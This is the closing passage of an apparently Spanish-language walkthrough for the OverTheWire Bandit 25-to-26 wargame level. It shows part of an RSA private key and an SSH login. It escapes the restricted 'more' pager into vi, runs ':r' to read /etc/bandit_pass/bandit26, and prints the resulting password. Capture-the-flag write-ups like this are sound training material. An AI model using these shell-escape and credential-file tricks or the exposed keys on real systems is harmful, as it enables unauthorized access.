il4fQFvLR7E6UFcopvhJiSJHIcvPQ9FfNFR3dYcNOQ/IFvE73bEqMwSISPwiel6w
e1DjF3C7jHaS1s9PJfWFN982aublL/yLbJP+ou3ifdljS7QzjWZA8NRiMwmBGPIh
Yq8weR3jIVQl3ndEYxO7Cr/wXXebZwlP6CPZb67rBy0jg+366mxQbDZIwZYEaUME
zY5izFclr/kKj4s7NTRkC76Yx+rTNP5+BX+JT+rgz5aoQq8ghMw43NYwxjXym/MX
c8X8g0ECgYEA1crBUAR1gSkM+5mGjjoFLJKrFP+IhUHFh25qGI4Dcxxh1f3M53le
wF1rkp5SJnHRFm9IW3gM1JoF0PQxI5aXHRGHphwPeKnsQ/xQBRWCeYpqTme9amJV
tD3aDHkpIhYxkNxqol5gDCAt6tdFSxqPaNfdfsfaAOXiKGrQESUjIBcCgYEAxvmI
2ROJsBXaiM4Iyg9hUpjZIn8TW2UlH76pojFG6/KBd1NcnW3fu0ZUU790wAu7QbbU
i7pieeqCqSYcZsmkhnOvbdx54A6NNCR2btc+si6pDOe1jdsGdXISDRHFb9QxjZCj
6xzWMNvb5n1yUb9w9nfN1PZzATfUsOV+Fy8CbG0CgYEAifkTLwfhqZyLk2huTSWm
pzB0ltWfDpj22MNqVzR3h3d+sHLeJVjPzIe9396rF8KGdNsWsGlWpnJMZKDjgZsz
JQBmMc6UMYRARVP1dIKANN4eY0FSHfEebHcqXLho0mXOUTXe37DWfZza5V9Oify3
JquBd8uUptW1Ue41H4t/ErsCgYEArc5FYtF1QXIlfcDz3oUGz16itUZpgzlb71nd
1cbTm8EupCwWR5I1j+IEQU+JTUQyI1nwWcnKwZI+5kBbKNJUu/mLsRyY/UXYxEZh
ibrNklm94373kV1US/0DlZUDcQba7jz9Yp/C3dT/RlwoIw5mP3UxQCizFspNKOSe
euPeaxUCgYEAntklXwBbokgdDup/u/3ms5Lb/bm22zDOCg2HrlWQCqKEkWkAO6R5
/Wwyqhp/wTl8VXjxWo+W+DmewGdPHGQQ5fFdqgpuQpGUq24YZS8m66v5ANBwd76t
IZdtF5HXs2S5CADTwniUS5mX1HO9l5gUkk+h0cH5JnPtsMCnAUM+BRY=
-----END RSA PRIVATE KEY-----

bandit25@melinda:~$ logout

vi .ssh/vertex
ssh -i .ssh/vertex bandit26@bandit.labs.overthewire.org -p22

Redimensionamos el terminal para que sea muy pequeño y no quepa el txt
Entramos en modo edición del more:

v

Leemos el fichero de pass:

:r /etc/bandit_pass/bandit26

5czgV9L3Xx8JPOyRbXh6lQbmIOWvPT6Z
Si te ha gustado el artículo puedes invitarme a un RedBull aquí